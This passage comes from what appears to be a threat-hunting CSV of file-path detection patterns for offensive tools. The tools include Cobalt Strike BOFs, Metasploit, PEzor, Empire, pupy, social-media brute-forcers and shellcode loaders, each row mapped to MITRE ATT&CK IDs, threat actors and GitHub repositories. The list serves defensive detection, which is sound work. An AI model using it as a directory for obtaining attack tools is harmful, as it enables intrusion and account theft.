TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injection/uxsubclassinfo*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Injections/SQL.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" 
+"*/injectsu.exp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/injectsu.lib*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/injectsu.pdb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/injectsu/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/inline_syscall.git*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z"
+"*/inline_syscall/include/in_memory_init.hpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z"
+"*/inline-exec/*.exe","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/InlineWhispers*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z"
+"*/insta-bf.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z"
+"*/instabf.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z"
+"*/instabrute.py*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z"
+"*/instainsane.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","5","473","329","2023-08-22T21:49:22Z","2018-12-02T22:48:11Z"
+"*/instainsane.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","5","473","329","2023-08-22T21:49:22Z","2018-12-02T22:48:11Z"
+"*/install_elevated.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/install-sb.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z"
+"*/insTof.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z"
+"*/interactive_shell.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/interactsh/*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C5","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z"
+"*/interactsh-client*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C6","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z"
+"*/interactsh-collaborator*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C15","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z"
+"*/interactsh-server*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C8","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z"
+"*/internal/C2/*.go*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z"
+"*/internal/pipe/pipe.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z"
+"*/Internals/Coff.cs*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z"
+"*/Inveigh.git*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z"
+"*/Inveigh.txt*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
+"*/Invoke-Bof/*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" +"*/Invoke-HostEnum.ps1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"*/Invoke-RunAs.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1084","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik 
Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/Invoke-SMBRemoting.git*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" +"*/IOXIDResolver.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/ip_spoof.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/IPayloadService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/ip-forwarding.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/IPfuscation.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*/IPfuscation.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*/ip-geolocation-geoplugin.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ip-geolocation-ipinfodb.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ip-geolocation-map-bing.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ip-geolocation-map-google.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ip-geolocation-map-kml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
